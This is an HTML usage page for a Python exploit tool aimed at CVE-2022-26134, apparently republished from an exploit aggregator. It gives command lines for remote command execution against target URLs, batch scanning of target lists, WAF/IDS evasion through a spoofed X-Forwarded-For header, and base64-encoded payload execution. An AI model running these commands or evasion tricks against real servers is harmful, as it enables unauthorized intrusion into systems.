Share
## https://sploitus.com/exploit?id=A31ACFB8-97BB-5D62-B1BA-D8B1DFDF84A0
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>ELAINA CORE Exploit Tool - CVE-2022-26134</title>
<style>
body {
font-family: "Segoe UI", sans-serif;
background: #0e0e0e;
color: #d0d0d0;
padding: 2em;
line-height: 1.6;
}
h1, h2 {
color: #f26b6b;
}
code {
background: #222;
color: #8df4ff;
padding: 0.2em 0.4em;
border-radius: 4px;
}
pre {
background: #1a1a1a;
padding: 1em;
border-left: 4px solid #f26b6b;
overflow-x: auto;
}
.section {
margin-bottom: 2em;
}
.footer {
font-size: 0.9em;
margin-top: 3em;
border-top: 1px solid #444;
padding-top: 1em;
color: #888;
}
a {
color: #7ddfff;
}
</style>
</head>
<body>
<h1>🛡️ ELAINA CORE Exploit Tool</h1>
<h2>CVE-2022-26134 - Red Team Pro Version</h2>
<p><strong>Coder:</strong> <a href="https://github.com/Yuri08loveElaina" target="_blank">Yuri08</a></p>
<p><strong>Website:</strong> <a href="https://yuri08loveelaina.github.io" target="_blank">yuri08loveelaina.github.io</a></p>
<p><strong>Warning:</strong> For authorized security testing only.</p>
<div class="section">
<h2>🚀 Cách sử dụng cơ bản</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "id"</code></pre>
</div>
<div class="section">
<h2>🔍 Kiểm tra phiên bản (check-only)</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --check-only</code></pre>
</div>
<div class="section">
<h2>📂 Quét nhiều mục tiêu (batch scan)</h2>
<pre><code>python3 exploit26134_pro.py --file targets.txt --cmd "whoami"</code></pre>
<p><strong>File <code>targets.txt</code> ví dụ:</strong></p>
<pre><code>https://target1.com
http://target2.com</code></pre>
</div>
<div class="section">
<h2>🕵️♂️ Chế độ stealth (ẩn mình)</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "whoami" --stealth</code></pre>
<ul>
<li>Payload được gửi qua POST</li>
<li>Thêm header <code>X-Forwarded-For</code> để tránh WAF/IDS</li>
</ul>
</div>
<div class="section">
<h2>🔐 Proxy Support (Burp / ZAP)</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "ls" --proxy http://127.0.0.1:8080</code></pre>
</div>
<div class="section">
<h2>📤 Xuất kết quả JSON</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "id" --json-output result.json</code></pre>
</div>
<div class="section">
<h2>🧬 Payload Bypass bằng Base64</h2>
<pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "ls -la" --base64</code></pre>
<p>Lệnh sẽ được encode và thực thi như sau: <code>bash -c "$(echo Y21kCg== | base64 -d)"</code></p>
</div>
<div class="section">
<h2>✅ Tính năng nổi bật</h2>
<ul>
<li>✔️ Batch scan nhiều host</li>
<li>✔️ Stealth mode tránh WAF</li>
<li>✔️ Check version & verify</li>
<li>✔️ Hỗ trợ proxy</li>
<li>✔️ JSON export</li>
<li>✔️ Base64 payload bypass</li>
</ul>
</div>
<div class="footer">
<p>© 2025 - Developed with ❤️ by Yuri08 | <a href="https://github.com/Yuri08loveElaina" target="_blank">github.com/Yuri08loveElaina</a></p>
</div>
</body>
</html>